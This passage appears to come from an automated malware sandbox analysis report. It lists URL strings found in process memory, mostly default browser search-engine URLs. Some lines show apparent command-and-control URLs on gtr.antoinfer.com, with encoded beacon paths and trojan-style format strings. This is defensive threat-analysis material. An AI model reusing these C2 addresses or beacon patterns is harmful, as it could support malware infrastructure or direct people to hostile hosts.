              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
              Source: rundll32.exe, 00000003.00000003.902106165.00000000064A8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
              Source: rundll32.exe, 00000003.00000003.902106165.00000000064A8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
              Source: {46823123-E0AB-11EB-90EB-ECF4BBEA1588}.dat.11.drString found in binary or memory: http://gtr.antoinfer.com/6jptEA6wC8OB7/q7vTQZto/d5CchjdbRrqZ5Z6Z_2Bg1vm/WfbX13QLJh/A2YEXLOoa_2F7tRm_
              Source: loaddll32.exe, 00000000.00000002.916548304.0000000001300000.00000002.00000001.sdmp, explorer.exe, 0000001B.00000002.929662607.0000000001080000.00000002.00000001.sdmp, control.exe, 0000001C.00000002.916658121.0000014B47120000.00000002.00000001.sdmpString found in binary or memory: http://gtr.antoinfer.com/7Ep6sOqsiggMUz11gUp6a/qtvd4K5Z0K1BVqPW/RYWSd53MfmcNiV5/RE881azalII7Gf_
              Source: {4CE81F43-E0AB-11EB-90EB-ECF4BBEA1588}.dat.11.dr, ~DF80F9FBD8B5E4CA4D.TMP.11.drString found in binary or memory: http://gtr.antoinfer.com/7Ep6sOqsiggMUz11gUp6a/qtvd4K5Z0K1BVqPW/RYWSd53MfmcNiV5/RE881azalII7Gf_2BB/L
              Source: {46823125-E0AB-11EB-90EB-ECF4BBEA1588}.dat.11.dr, ~DFE5A3706066494A6C.TMP.11.drString found in binary or memory: http://gtr.antoinfer.com/iJicPEzpWLt9kIte6bxUGY/_2BR7ODZwRNCt/zjY2vw66/miliEkUQv2irt3ku_2FqNHB/akyqF
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
              Source: rundll32.exe, 00000003.00000003.902106165.00000000064A8000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
              Source: explorer.exe, 0000001B.00000000.918639012.0000000006AD0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
              Source: explorer.exe, 0000001B.00000000.918639012.0000000006AD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
              Source: explorer.exe, 0000001B.00000000.904431386.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.923197016.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
